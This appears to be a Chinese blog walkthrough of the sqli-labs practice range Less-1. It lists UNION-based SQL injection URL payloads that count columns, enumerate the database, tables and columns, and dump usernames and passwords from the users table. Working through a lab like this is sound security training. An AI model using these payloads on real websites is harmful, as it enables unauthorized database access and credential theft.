sql注入——靶场Less1

?id=1

?id=99'union select 1,2,3--+

查看占位

?id=1' order by 3--+

尝试出表有几列

?id=1' order by 4--+

说明只有三列

?id=99' union select 1,database(),3--+

查询当前使用的数据库的名称

?id=99' union select 1,group_concat(table_name),3 from information_schema.tables where table.schema='security'--+

查询security表中有哪些表

?id=99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

查询users表中有哪些信息

?id=99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+

展示所有users表中的信息

相关推荐
欧先生^_^6 分钟前
Jinja 的详细介绍和学习方法
数据库·sqlite
husterlichf7 分钟前
MYSQL 常用字符串函数 和 时间函数详解
数据库·sql·mysql
什么芮.15 分钟前
spark-streaming
pytorch·sql·spark·kafka·scala
hnlucky32 分钟前
redis 数据类型新手练习系列——Hash类型
数据库·redis·学习·哈希算法
LucianaiB1 小时前
【金仓数据库征文】_AI 赋能数据库运维:金仓KES的智能化未来
运维·数据库·人工智能·金仓数据库 2025 征文·数据库平替用金仓
时序数据说2 小时前
时序数据库IoTDB在航空航天领域的解决方案
大数据·数据库·时序数据库·iotdb
.生产的驴2 小时前
SpringBoot 封装统一API返回格式对象 标准化开发 请求封装 统一格式处理
java·数据库·spring boot·后端·spring·eclipse·maven
AnsenZhu2 小时前
2025年Redis分片存储性能优化指南
数据库·redis·性能优化·分片
oydcm2 小时前
MySQL数据库概述
数据库·mysql
oioihoii3 小时前
C++23中if consteval / if not consteval (P1938R3) 详解
java·数据库·c++23